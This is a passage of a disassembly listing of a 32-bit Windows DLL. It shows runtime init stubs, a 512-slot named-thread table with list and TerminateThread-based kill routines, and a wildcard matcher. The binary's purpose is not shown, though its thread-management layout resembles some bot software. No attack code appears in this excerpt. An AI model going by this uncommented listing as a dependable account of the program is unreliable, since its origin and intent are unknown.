call ds:??1Init@ios_base@std@@QAE@XZ ; std::ios_base::Init::~Init(void)
pop ebp
retn
sub_1000A701 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000A711 proc near ; DATA XREF: .data:1000E060�o
push ebp
mov ebp, esp
call sub_1000A720
call sub_1000A730
pop ebp
retn
sub_1000A711 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000A720 proc near ; CODE XREF: sub_1000A711+3�p
push ebp
mov ebp, esp
mov ecx, offset byte_1002D148
call ds:??0_Winit@std@@QAE@XZ ; std::_Winit::_Winit(void)
pop ebp
retn
sub_1000A720 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000A730 proc near ; CODE XREF: sub_1000A711+8�p
push ebp
mov ebp, esp
push offset sub_1000A742 ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_1000A730 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_1000A742()
sub_1000A742 proc near ; DATA XREF: sub_1000A730+3�o
push ebp
mov ebp, esp
mov ecx, offset byte_1002D148
call ds:??1_Winit@std@@QAE@XZ ; std::_Winit::~_Winit(void)
pop ebp
retn
sub_1000A742 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_1000A752(char *Source,int)
sub_1000A752 proc near ; CODE XREF: sub_10007424+E99�p
; sub_10007424+FE8�p ...
var_4 = dword ptr -4
Source = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 0
jmp short loc_1000A768
; ---------------------------------------------------------------------------
loc_1000A75F: ; CODE XREF: sub_1000A752:loc_1000A7C7�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_1000A768: ; CODE XREF: sub_1000A752+B�j
cmp [ebp+var_4], 200h
jge short loc_1000A7C9
mov ecx, [ebp+var_4]
imul ecx, 0CCh
movsx edx, byte_10012DD8[ecx]
test edx, edx
jnz short loc_1000A7C7
push 40h ; Count
mov eax, [ebp+Source]
push eax ; Source
mov ecx, [ebp+var_4]
imul ecx, 0CCh
add ecx, offset byte_10012DD8
push ecx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
push 80h ; Count
mov edx, [ebp+arg_4]
push edx ; Source
mov eax, [ebp+var_4]
imul eax, 0CCh
add eax, offset dword_10012E18
push eax ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
jmp short loc_1000A7C9
; ---------------------------------------------------------------------------
loc_1000A7C7: ; CODE XREF: sub_1000A752+31�j
jmp short loc_1000A75F
; ---------------------------------------------------------------------------
loc_1000A7C9: ; CODE XREF: sub_1000A752+1D�j
; sub_1000A752+73�j
mov ecx, [ebp+var_4]
imul ecx, 0CCh
movsx edx, byte_10012DD8[ecx]
test edx, edx
jnz short loc_1000A7E2
or eax, 0FFFFFFFFh
jmp short loc_1000A7E5
; ---------------------------------------------------------------------------
loc_1000A7E2: ; CODE XREF: sub_1000A752+89�j
mov eax, [ebp+var_4]
loc_1000A7E5: ; CODE XREF: sub_1000A752+8E�j
mov esp, ebp
pop ebp
retn
sub_1000A752 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_1000A7E9(char *Str1)
sub_1000A7E9 proc near ; CODE XREF: sub_10009C30+B�p
; sub_10009EF0+8E�p
var_8 = dword ptr -8
var_4 = dword ptr -4
Str1 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_4], 0
mov [ebp+var_8], 0
jmp short loc_1000A808
; ---------------------------------------------------------------------------
loc_1000A7FF: ; CODE XREF: sub_1000A7E9+3C�j
; sub_1000A7E9:loc_1000A84F�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_1000A808: ; CODE XREF: sub_1000A7E9+14�j
cmp [ebp+var_4], 200h
jge short loc_1000A851
mov ecx, [ebp+var_4]
imul ecx, 0CCh
movsx edx, byte_10012DD8[ecx]
test edx, edx
jnz short loc_1000A827
jmp short loc_1000A7FF
; ---------------------------------------------------------------------------
loc_1000A827: ; CODE XREF: sub_1000A7E9+3A�j
mov eax, [ebp+var_4]
imul eax, 0CCh
add eax, offset byte_10012DD8
push eax ; Str2
mov ecx, [ebp+Str1]
push ecx ; Str1
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz short loc_1000A84F
mov edx, [ebp+var_8]
add edx, 1
mov [ebp+var_8], edx
loc_1000A84F: ; CODE XREF: sub_1000A7E9+5B�j
jmp short loc_1000A7FF
; ---------------------------------------------------------------------------
loc_1000A851: ; CODE XREF: sub_1000A7E9+26�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_1000A7E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000A858 proc near ; CODE XREF: sub_10007424+16EC�p
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov dword ptr [ebp+var_4], 0
jmp short loc_1000A86E
; ---------------------------------------------------------------------------
loc_1000A865: ; CODE XREF: sub_1000A858:loc_1000A8CA�j
mov eax, dword ptr [ebp+var_4]
add eax, 1
mov dword ptr [ebp+var_4], eax
loc_1000A86E: ; CODE XREF: sub_1000A858+B�j
cmp dword ptr [ebp+var_4], 200h
jge short loc_1000A8CC
mov ecx, dword ptr [ebp+var_4]
imul ecx, 0CCh
movsx edx, byte_10012DD8[ecx]
test edx, edx
jz short loc_1000A8CA
mov eax, dword ptr [ebp+var_4]
imul eax, 0CCh
add eax, offset dword_10012E18
push eax
mov ecx, dword ptr [ebp+var_4]
imul ecx, 0CCh
add ecx, offset byte_10012DD8
push ecx
mov edx, dword ptr [ebp+var_4]
push edx ; char
push offset aD_SS ; "%d. %s (%s)"
mov eax, [ebp+arg_0]
push eax ; int
call sub_10007303
add esp, 14h
push 3E8h ; dwMilliseconds
call ds:Sleep ; Sleep
loc_1000A8CA: ; CODE XREF: sub_1000A858+31�j
jmp short loc_1000A865
; ---------------------------------------------------------------------------
loc_1000A8CC: ; CODE XREF: sub_1000A858+1D�j
mov esp, ebp
pop ebp
retn
sub_1000A858 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_1000A8D0(char *Str1)
sub_1000A8D0 proc near ; CODE XREF: sub_10007424+1477�p
; sub_10007424+1484�p ...
var_4 = dword ptr -4
Str1 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 0
jmp short loc_1000A8E6
; ---------------------------------------------------------------------------
loc_1000A8DD: ; CODE XREF: sub_1000A8D0+37�j
; sub_1000A8D0:loc_1000AA00�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_1000A8E6: ; CODE XREF: sub_1000A8D0+B�j
cmp [ebp+var_4], 200h
jge loc_1000AA05
mov ecx, [ebp+var_4]
imul ecx, 0CCh
movsx edx, byte_10012DD8[ecx]
test edx, edx
jnz short loc_1000A909
jmp short loc_1000A8DD
; ---------------------------------------------------------------------------
loc_1000A909: ; CODE XREF: sub_1000A8D0+35�j
mov eax, [ebp+var_4]
imul eax, 0CCh
add eax, offset byte_10012DD8
push eax ; Str2
mov ecx, [ebp+Str1]
push ecx ; Str1
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz loc_1000AA00
mov edx, [ebp+var_4]
imul edx, 0CCh
xor eax, eax
mov al, byte_10012E98[edx]
test eax, eax
jz short loc_1000A958
mov ecx, [ebp+var_4]
imul ecx, 0CCh
mov byte_10012E98[ecx], 0
mov byte_1002D0F6, 0
loc_1000A958: ; CODE XREF: sub_1000A8D0+6F�j
mov edx, [ebp+var_4]
imul edx, 0CCh
xor eax, eax
mov al, byte_10012E99[edx]
test eax, eax
jz short loc_1000A984
mov ecx, [ebp+var_4]
imul ecx, 0CCh
mov byte_10012E99[ecx], 0
mov byte_1002D0F7, 0
loc_1000A984: ; CODE XREF: sub_1000A8D0+9B�j
push 0 ; dwExitCode
mov edx, [ebp+var_4]
imul edx, 0CCh
mov eax, dword_10012EA0[edx]
push eax ; hThread
call ds:TerminateThread ; TerminateThread
mov ecx, [ebp+var_4]
imul ecx, 0CCh
mov edx, dword_10012EA0[ecx]
push edx ; hObject
call ds:CloseHandle ; CloseHandle
mov eax, [ebp+var_4]
imul eax, 0CCh
mov dword_10012EA0[eax], 0
push 40h ; Size
push 0 ; Val
mov ecx, [ebp+var_4]
imul ecx, 0CCh
add ecx, offset byte_10012DD8
push ecx ; Dst
call memset ; memset
add esp, 0Ch
push 80h ; Size
push 0 ; Val
mov edx, [ebp+var_4]
imul edx, 0CCh
add edx, offset dword_10012E18
push edx ; Dst
call memset ; memset
add esp, 0Ch
loc_1000AA00: ; CODE XREF: sub_1000A8D0+56�j
jmp loc_1000A8DD
; ---------------------------------------------------------------------------
loc_1000AA05: ; CODE XREF: sub_1000A8D0+1D�j
mov esp, ebp
pop ebp
retn
sub_1000A8D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000AA09 proc near ; CODE XREF: sub_10007424+17A3�p
; sub_1000AAE1+37�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
imul eax, 0CCh
xor ecx, ecx
mov cl, byte_10012E98[eax]
test ecx, ecx
jz short loc_1000AA38
mov edx, [ebp+arg_0]
imul edx, 0CCh
mov byte_10012E98[edx], 0
mov byte_1002D0F6, 0
loc_1000AA38: ; CODE XREF: sub_1000AA09+16�j
mov eax, [ebp+arg_0]
imul eax, 0CCh
xor ecx, ecx
mov cl, byte_10012E99[eax]
test ecx, ecx
jz short loc_1000AA64
mov edx, [ebp+arg_0]
imul edx, 0CCh
mov byte_10012E99[edx], 0
mov byte_1002D0F7, 0
loc_1000AA64: ; CODE XREF: sub_1000AA09+42�j
push 0 ; dwExitCode
mov eax, [ebp+arg_0]
imul eax, 0CCh
mov ecx, dword_10012EA0[eax]
push ecx ; hThread
call ds:TerminateThread ; TerminateThread
mov edx, [ebp+arg_0]
imul edx, 0CCh
mov eax, dword_10012EA0[edx]
push eax ; hObject
call ds:CloseHandle ; CloseHandle
mov ecx, [ebp+arg_0]
imul ecx, 0CCh
mov dword_10012EA0[ecx], 0
push 40h ; Size
push 0 ; Val
mov edx, [ebp+arg_0]
imul edx, 0CCh
add edx, offset byte_10012DD8
push edx ; Dst
call memset ; memset
add esp, 0Ch
push 80h ; Size
push 0 ; Val
mov eax, [ebp+arg_0]
imul eax, 0CCh
add eax, offset dword_10012E18
push eax ; Dst
call memset ; memset
add esp, 0Ch
pop ebp
retn
sub_1000AA09 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000AAE1 proc near ; CODE XREF: sub_10007424+951�p
; sub_10007424:loc_10007DDA�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 0
jmp short loc_1000AAF7
; ---------------------------------------------------------------------------
loc_1000AAEE: ; CODE XREF: sub_1000AAE1:loc_1000AB20�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_1000AAF7: ; CODE XREF: sub_1000AAE1+B�j
cmp [ebp+var_4], 200h
jge short loc_1000AB22
mov ecx, [ebp+var_4]
imul ecx, 0CCh
movsx edx, byte_10012DD8[ecx]
test edx, edx
jz short loc_1000AB20
mov eax, [ebp+var_4]
push eax
call sub_1000AA09
add esp, 4
loc_1000AB20: ; CODE XREF: sub_1000AAE1+31�j
jmp short loc_1000AAEE
; ---------------------------------------------------------------------------
loc_1000AB22: ; CODE XREF: sub_1000AAE1+1D�j
mov esp, ebp
pop ebp
retn
sub_1000AAE1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000AB26 proc near ; CODE XREF: sub_1000329E+752�p
; StartAddress+2B2�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
imul eax, 0CCh
xor ecx, ecx
mov cl, byte_10012E98[eax]
test ecx, ecx
jz short loc_1000AB55
mov edx, [ebp+arg_0]
imul edx, 0CCh
mov byte_10012E98[edx], 0
mov byte_1002D0F6, 0
loc_1000AB55: ; CODE XREF: sub_1000AB26+16�j
mov eax, [ebp+arg_0]
imul eax, 0CCh
xor ecx, ecx
mov cl, byte_10012E99[eax]
test ecx, ecx
jz short loc_1000AB81
mov edx, [ebp+arg_0]
imul edx, 0CCh
mov byte_10012E99[edx], 0
mov byte_1002D0F7, 0
loc_1000AB81: ; CODE XREF: sub_1000AB26+42�j
mov eax, [ebp+arg_4]
and eax, 0FFh
test eax, eax
jz short loc_1000ABA3
mov ecx, [ebp+arg_0]
imul ecx, 0CCh
mov edx, dword_10012EA0[ecx]
push edx ; hObject
call ds:CloseHandle ; CloseHandle
loc_1000ABA3: ; CODE XREF: sub_1000AB26+65�j
mov eax, [ebp+arg_0]
imul eax, 0CCh
mov dword_10012EA0[eax], 0
push 40h ; Size
push 0 ; Val
mov ecx, [ebp+arg_0]
imul ecx, 0CCh
add ecx, offset byte_10012DD8
push ecx ; Dst
call memset ; memset
add esp, 0Ch
push 80h ; Size
push 0 ; Val
mov edx, [ebp+arg_0]
imul edx, 0CCh
add edx, offset dword_10012E18
push edx ; Dst
call memset ; memset
add esp, 0Ch
pop ebp
retn
sub_1000AB26 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000ABF3 proc near ; CODE XREF: start+107�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 0
jmp short loc_1000AC09
; ---------------------------------------------------------------------------
loc_1000AC00: ; CODE XREF: sub_1000ABF3+2D�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_1000AC09: ; CODE XREF: sub_1000ABF3+B�j
cmp [ebp+var_4], 200h
jge short loc_1000AC22
push 0
mov ecx, [ebp+var_4]
push ecx
call sub_1000AB26
add esp, 8
jmp short loc_1000AC00
; ---------------------------------------------------------------------------
loc_1000AC22: ; CODE XREF: sub_1000ABF3+1D�j
mov esp, ebp
pop ebp
retn
sub_1000ABF3 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000AC30 proc near ; DATA XREF: .data:1000E064�o
push ebp
mov ebp, esp
call sub_1000AC3F
call sub_1000AC4F
pop ebp
retn
sub_1000AC30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000AC3F proc near ; CODE XREF: sub_1000AC30+3�p
push ebp
mov ebp, esp
mov ecx, offset byte_1002D151
call ds:??0Init@ios_base@std@@QAE@XZ ; std::ios_base::Init::Init(void)
pop ebp
retn
sub_1000AC3F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000AC4F proc near ; CODE XREF: sub_1000AC30+8�p
push ebp
mov ebp, esp
push offset sub_1000AC61 ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_1000AC4F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_1000AC61()
sub_1000AC61 proc near ; DATA XREF: sub_1000AC4F+3�o
push ebp
mov ebp, esp
mov ecx, offset byte_1002D151
call ds:??1Init@ios_base@std@@QAE@XZ ; std::ios_base::Init::~Init(void)
pop ebp
retn
sub_1000AC61 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000AC71 proc near ; DATA XREF: .data:1000E068�o
push ebp
mov ebp, esp
call sub_1000AC80
call sub_1000AC90
pop ebp
retn
sub_1000AC71 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000AC80 proc near ; CODE XREF: sub_1000AC71+3�p
push ebp
mov ebp, esp
mov ecx, offset byte_1002D150
call ds:??0_Winit@std@@QAE@XZ ; std::_Winit::_Winit(void)
pop ebp
retn
sub_1000AC80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000AC90 proc near ; CODE XREF: sub_1000AC71+8�p
push ebp
mov ebp, esp
push offset sub_1000ACA2 ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_1000AC90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_1000ACA2()
sub_1000ACA2 proc near ; DATA XREF: sub_1000AC90+3�o
push ebp
mov ebp, esp
mov ecx, offset byte_1002D150
call ds:??1_Winit@std@@QAE@XZ ; std::_Winit::~_Winit(void)
pop ebp
retn
sub_1000ACA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000ACB2 proc near ; CODE XREF: sub_10007424+73E�p
; sub_1000AEF7+DF�p ...
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_4], 1
jmp short loc_1000ACCA
; ---------------------------------------------------------------------------
loc_1000ACC1: ; CODE XREF: sub_1000ACB2:loc_1000AD72�j
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
loc_1000ACCA: ; CODE XREF: sub_1000ACB2+D�j
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx]
test edx, edx
jz loc_1000AD77
cmp [ebp+var_4], 1
jnz loc_1000AD77
mov eax, [ebp+arg_4]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz loc_1000AD77
mov edx, [ebp+arg_0]
mov al, [edx]
mov [ebp+var_8], al
cmp [ebp+var_8], 2Ah
jz short loc_1000AD35
cmp [ebp+var_8], 3Fh
jz short loc_1000AD2A
cmp [ebp+var_8], 5Bh
jz short loc_1000AD0C
jmp short loc_1000AD53
; ---------------------------------------------------------------------------
loc_1000AD0C: ; CODE XREF: sub_1000ACB2+56�j
mov ecx, [ebp+arg_0]
add ecx, 1
mov [ebp+arg_0], ecx
lea edx, [ebp+arg_4]
push edx
lea eax, [ebp+arg_0]
push eax
call sub_1000ADC4
add esp, 8
mov [ebp+var_4], eax
jmp short loc_1000AD72
; ---------------------------------------------------------------------------
loc_1000AD2A: ; CODE XREF: sub_1000ACB2+50�j
mov ecx, [ebp+arg_4]
add ecx, 1
mov [ebp+arg_4], ecx
jmp short loc_1000AD72
; ---------------------------------------------------------------------------
loc_1000AD35: ; CODE XREF: sub_1000ACB2+4A�j
lea edx, [ebp+arg_4]
push edx
lea eax, [ebp+arg_0]
push eax
call sub_1000AEF7
add esp, 8
mov [ebp+var_4], eax
mov ecx, [ebp+arg_0]
sub ecx, 1
mov [ebp+arg_0], ecx
jmp short loc_1000AD72
; ---------------------------------------------------------------------------
loc_1000AD53: ; CODE XREF: sub_1000ACB2+58�j
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx]
mov ecx, [ebp+arg_4]
movsx edx, byte ptr [ecx]
xor ecx, ecx
cmp eax, edx
setz cl
mov [ebp+var_4], ecx
mov edx, [ebp+arg_4]
add edx, 1
mov [ebp+arg_4], edx
loc_1000AD72: ; CODE XREF: sub_1000ACB2+76�j
; sub_1000ACB2+81�j ...
jmp loc_1000ACC1
; ---------------------------------------------------------------------------
loc_1000AD77: ; CODE XREF: sub_1000ACB2+20�j
; sub_1000ACB2+2A�j ...
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
cmp ecx, 2Ah
jnz short loc_1000AD93
cmp [ebp+var_4], 1
jnz short loc_1000AD93
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
jmp short loc_1000AD77
; ---------------------------------------------------------------------------
loc_1000AD93: ; CODE XREF: sub_1000ACB2+CE�j
; sub_1000ACB2+D4�j
cmp [ebp+var_4], 1
jnz short loc_1000ADB6
mov eax, [ebp+arg_4]
movsx ecx, byte ptr [eax]
test ecx, ecx
jnz short loc_1000ADB6
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx]
test eax, eax
jnz short loc_1000ADB6
mov [ebp+var_C], 1
jmp short loc_1000ADBD
; ---------------------------------------------------------------------------
loc_1000ADB6: ; CODE XREF: sub_1000ACB2+E5�j
; sub_1000ACB2+EF�j ...
mov [ebp+var_C], 0
loc_1000ADBD: ; CODE XREF: sub_1000ACB2+102�j
mov eax, [ebp+var_C]
mov esp, ebp
pop ebp
retn
sub_1000ACB2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000ADC4 proc near ; CODE XREF: sub_1000ACB2+6B�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_4], 0
mov [ebp+var_8], 0
mov [ebp+var_C], 1
mov eax, [ebp+arg_0]
mov ecx, [eax]
movsx edx, byte ptr [ecx]
cmp edx, 21h
jnz short loc_1000AE00
mov [ebp+var_8], 1
mov eax, [ebp+arg_0]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_0]
mov [edx], ecx
loc_1000AE00: ; CODE XREF: sub_1000ADC4+26�j
; sub_1000ADC4+103�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
movsx edx, byte ptr [ecx]
cmp edx, 5Dh
jnz short loc_1000AE17
cmp [ebp+var_C], 1
jnz loc_1000AECC
loc_1000AE17: ; CODE XREF: sub_1000ADC4+47�j
cmp [ebp+var_4], 0
jnz loc_1000AEB3
mov eax, [ebp+arg_0]
mov ecx, [eax]
movsx edx, byte ptr [ecx]
cmp edx, 2Dh
jnz short loc_1000AE98
mov eax, [ebp+arg_0]
mov ecx, [eax]
movsx edx, byte ptr [ecx-1]
mov eax, [ebp+arg_0]
mov ecx, [eax]
movsx eax, byte ptr [ecx+1]
cmp edx, eax
jge short loc_1000AE98
mov ecx, [ebp+arg_0]
mov edx, [ecx]
movsx eax, byte ptr [edx+1]
cmp eax, 5Dh
jz short loc_1000AE98
cmp [ebp+var_C], 0
jnz short loc_1000AE98
mov ecx, [ebp+arg_4]
mov edx, [ecx]
movsx eax, byte ptr [edx]
mov ecx, [ebp+arg_0]
mov edx, [ecx]
movsx ecx, byte ptr [edx-1]
cmp eax, ecx
jl short loc_1000AE96
mov edx, [ebp+arg_4]
mov eax, [edx]
movsx ecx, byte ptr [eax]
mov edx, [ebp+arg_0]
mov eax, [edx]
movsx edx, byte ptr [eax+1]
cmp ecx, edx
jg short loc_1000AE96
mov [ebp+var_4], 1
mov eax, [ebp+arg_0]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_0]
mov [edx], ecx
loc_1000AE96: ; CODE XREF: sub_1000ADC4+A7�j
; sub_1000ADC4+BC�j
jmp short loc_1000AEB3
; ---------------------------------------------------------------------------
loc_1000AE98: ; CODE XREF: sub_1000ADC4+68�j
; sub_1000ADC4+7E�j ...
mov eax, [ebp+arg_0]
mov ecx, [eax]
movsx edx, byte ptr [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax]
movsx eax, byte ptr [ecx]
cmp edx, eax
jnz short loc_1000AEB3
mov [ebp+var_4], 1
loc_1000AEB3: ; CODE XREF: sub_1000ADC4+57�j
; sub_1000ADC4:loc_1000AE96�j ...
mov ecx, [ebp+arg_0]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_0]
mov [eax], edx
mov [ebp+var_C], 0
jmp loc_1000AE00
; ---------------------------------------------------------------------------
loc_1000AECC: ; CODE XREF: sub_1000ADC4+4D�j
cmp [ebp+var_8], 1
jnz short loc_1000AEDD
mov ecx, 1
sub ecx, [ebp+var_4]
mov [ebp+var_4], ecx
loc_1000AEDD: ; CODE XREF: sub_1000ADC4+10C�j
cmp [ebp+var_4], 1
jnz short loc_1000AEF0
mov edx, [ebp+arg_4]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+arg_4]
mov [ecx], eax
loc_1000AEF0: ; CODE XREF: sub_1000ADC4+11D�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_1000ADC4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000AEF7 proc near ; CODE XREF: sub_1000ACB2+8B�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_4], 1
mov eax, [ebp+arg_0]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_0]
mov [edx], ecx
loc_1000AF11: ; CODE XREF: sub_1000AEF7+67�j
mov eax, [ebp+arg_4]
mov ecx, [eax]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_1000AF60
mov eax, [ebp+arg_0]
mov ecx, [eax]
movsx edx, byte ptr [ecx]
cmp edx, 3Fh
jz short loc_1000AF37
mov eax, [ebp+arg_0]
mov ecx, [eax]
movsx edx, byte ptr [ecx]
cmp edx, 2Ah
jnz short loc_1000AF60
loc_1000AF37: ; CODE XREF: sub_1000AEF7+31�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
movsx edx, byte ptr [ecx]
cmp edx, 3Fh
jnz short loc_1000AF51
mov eax, [ebp+arg_4]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_4]
mov [edx], ecx
loc_1000AF51: ; CODE XREF: sub_1000AEF7+4B�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_0]
mov [edx], ecx
jmp short loc_1000AF11
; ---------------------------------------------------------------------------
loc_1000AF60: ; CODE XREF: sub_1000AEF7+24�j
; sub_1000AEF7+3E�j ...
mov eax, [ebp+arg_0]
mov ecx, [eax]
movsx edx, byte ptr [ecx]
cmp edx, 2Ah
jnz short loc_1000AF7C
mov eax, [ebp+arg_0]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_0]
mov [edx], ecx
jmp short loc_1000AF60
; ---------------------------------------------------------------------------
loc_1000AF7C: ; CODE XREF: sub_1000AEF7+74�j
mov eax, [ebp+arg_4]
mov ecx, [eax]
movsx edx, byte ptr [ecx]
test edx, edx
jnz short loc_1000AFA3
mov eax, [ebp+arg_0]
mov ecx, [eax]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_1000AFA3
mov [ebp+var_4], 0
mov eax, [ebp+var_4]
jmp loc_1000B098
; ---------------------------------------------------------------------------
loc_1000AFA3: ; CODE XREF: sub_1000AEF7+8F�j
; sub_1000AEF7+9B�j
mov eax, [ebp+arg_4]
mov ecx, [eax]
movsx edx, byte ptr [ecx]
test edx, edx
jnz short loc_1000AFCA
mov eax, [ebp+arg_0]
mov ecx, [eax]
movsx edx, byte ptr [ecx]
test edx, edx
jnz short loc_1000AFCA
mov [ebp+var_4], 1
mov eax, [ebp+var_4]
jmp loc_1000B098
; ---------------------------------------------------------------------------
loc_1000AFCA: ; CODE XREF: sub_1000AEF7+B6�j
; sub_1000AEF7+C2�j
mov eax, [ebp+arg_4]
mov ecx, [eax]
push ecx
mov edx, [ebp+arg_0]
mov eax, [edx]
push eax
call sub_1000ACB2
add esp, 8
test eax, eax
jnz loc_1000B076
loc_1000AFE6: ; CODE XREF: sub_1000AEF7+179�j
mov ecx, [ebp+arg_4]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_4]
mov [eax], edx
loc_1000AFF3: ; CODE XREF: sub_1000AEF7+136�j
mov ecx, [ebp+arg_0]
mov edx, [ecx]
movsx eax, byte ptr [edx]
mov ecx, [ebp+arg_4]
mov edx, [ecx]
movsx ecx, byte ptr [edx]
cmp eax, ecx
jz short loc_1000B02F
mov edx, [ebp+arg_0]
mov eax, [edx]
movsx ecx, byte ptr [eax]
cmp ecx, 5Bh
jz short loc_1000B02F
mov edx, [ebp+arg_4]
mov eax, [edx]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_1000B02F
mov edx, [ebp+arg_4]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+arg_4]
mov [ecx], eax
jmp short loc_1000AFF3
; ---------------------------------------------------------------------------
loc_1000B02F: ; CODE XREF: sub_1000AEF7+10E�j
; sub_1000AEF7+11B�j ...
mov edx, [ebp+arg_4]
mov eax, [edx]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_1000B059
mov edx, [ebp+arg_4]
mov eax, [edx]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx]
push edx
call sub_1000ACB2
add esp, 8
neg eax
sbb eax, eax
inc eax
mov [ebp+var_8], eax
jmp short loc_1000B06C
; ---------------------------------------------------------------------------
loc_1000B059: ; CODE XREF: sub_1000AEF7+142�j
mov [ebp+var_4], 0
xor eax, eax
cmp [ebp+var_4], 0
setnz al
mov [ebp+var_8], eax
loc_1000B06C: ; CODE XREF: sub_1000AEF7+160�j
cmp [ebp+var_8], 0
jnz loc_1000AFE6
loc_1000B076: ; CODE XREF: sub_1000AEF7+E9�j
mov ecx, [ebp+arg_4]
mov edx, [ecx]
movsx eax, byte ptr [edx]
test eax, eax
jnz short loc_1000B095
mov ecx, [ebp+arg_0]
mov edx, [ecx]
movsx eax, byte ptr [edx]
test eax, eax
jnz short loc_1000B095
mov [ebp+var_4], 1
loc_1000B095: ; CODE XREF: sub_1000AEF7+189�j
; sub_1000AEF7+195�j
mov eax, [ebp+var_4]
loc_1000B098: ; CODE XREF: sub_1000AEF7+A7�j
; sub_1000AEF7+CE�j
mov esp, ebp
pop ebp
retn
sub_1000AEF7 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000B0A0 proc near ; DATA XREF: .data:1000E06C�o
push ebp
mov ebp, esp
call sub_1000B0AF
call sub_1000B0BF
pop ebp
retn
sub_1000B0A0 endp
